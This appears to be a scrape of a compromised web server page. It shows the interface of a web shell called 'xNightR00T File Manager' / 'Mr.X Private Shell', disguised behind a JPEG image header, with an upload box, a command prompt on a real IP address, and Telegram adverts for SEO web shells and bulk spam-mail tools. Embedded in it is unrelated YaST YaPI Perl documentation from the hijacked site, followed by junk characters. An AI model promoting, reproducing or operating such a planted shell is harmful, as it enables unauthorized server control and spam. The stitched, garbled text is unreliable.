xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?xml version="1.0" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<link rev="made" href="mailto:none" />
</head>

<body style="background-color: white">



<ul id="index">
  <li><a href="#NAME">NAME</a>
    <ul>
      <li><a href="#base-functions">base functions</a>
        <ul>
          <li><a href="#Interface">Interface</a></li>
          <li><a href="#Version">Version</a></li>
          <li><a href="#Supports">Supports</a></li>
          <li><a href="#SetError">SetError</a></li>
          <li><a href="#Error">Error</a></li>
        </ul>
      </li>
      <li><a href="#i18n">i18n</a>
        <ul>
          <li><a href="#textdomain">textdomain</a></li>
          <li><a href="#double-underscore">__ (double underscore)</a></li>
        </ul>
      </li>
    </ul>
  </li>
</ul>

<h1 id="NAME">NAME</h1>

<p>YaPI - common functions for modules implementing YaST API</p>

<h2 id="base-functions">base functions</h2>

<p>These are to be used by modules that use YaPI as their base class.</p>

<pre><code>  use YaPI;
  our @ISA = (&quot;YaPI&quot;);</code></pre>

<h3 id="Interface">Interface</h3>

<p>Returns a reference to a list of hashes describing the functions in the current package. The information is taken from TYPEINFO.</p>

<pre><code>  [
   {
      functionName =&gt; &quot;contains&quot;,
      return =&gt; &quot;boolean&quot;,
      argument =&gt; [ &quot;string&quot;, [&quot;list&quot;, &quot;string&quot;]],
   },
   ...
  ]</code></pre>

<h3 id="Version">Version</h3>

<p>Returns the version of the current package.</p>

<h3 id="Supports">Supports</h3>

<p>Greps <code>@CAPABILITIES</code> of the current package.</p>

<pre><code>  if (YaPI::Foo-&gt;Supports (&quot;frobnicate&quot;)) {...}</code></pre>

<h3 id="SetError">SetError</h3>

<p>Logs an error and remembers it for <a href="#Error">&quot;Error&quot;</a>.</p>

<p>Error map:</p>

<pre><code>  {
    code                # mandatory, an uppercase short string
    summary
    description
  # if all of the following are missing, caller () is used
    package
    file
    line
  }</code></pre>

<h3 id="Error">Error</h3>

<p>Returns the error set by <a href="#SetError">&quot;SetError&quot;</a></p>

<h2 id="i18n">i18n</h2>

<p><code>use YaPI;</code></p>

<p><code>textdomain &quot;mydomain&quot;;</code></p>

<p>Just use a double underscore to mark text to be translated: <code>__(&quot;my text&quot;)</code>. Both <code>textdomain</code> and <code>__</code> are exported to the calling package.</p>

<p>These must not be used any longer because they collide with symbols exported by this module:</p>

<pre><code> #  use Locale::gettext;    # textdomain
 #  sub _ { ... }</code></pre>

<p>These don&#39;t hurt but aren&#39;t necessary:</p>

<pre><code> #  use POSIX ();
 #  POSIX::setlocale(LC_MESSAGES, &quot;&quot;);    # YaPI calls it itself now</code></pre>

<h3 id="textdomain">textdomain</h3>

<p>Calls Locale::gettext::textdomain and also remembers an association between the calling package and the domain. Later calls of __ use this domain as an argument to dgettext.</p>

<h3 id="double-underscore">__ (double underscore)</h3>

<p>Calls Locale::gettext::dgettext, supplying the textdomain of the calling package (set by calling textdomain).</p>

<p>Note: the single underscore function (_) will be removed because it is automaticaly exported to main:: which causes namespace conflicts.</p>


</body>

</html>



Filemanager

Name Type Size Permission Actions
examples Folder 0755
modules Folder 0755
COPYING File 17.67 KB 0644
YaPI.html File 3.53 KB 0644
YaST__YCP.html File 8.3 KB 0644
perl-bindings File 3.13 KB 0644
useperl.ycp File 234 B 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1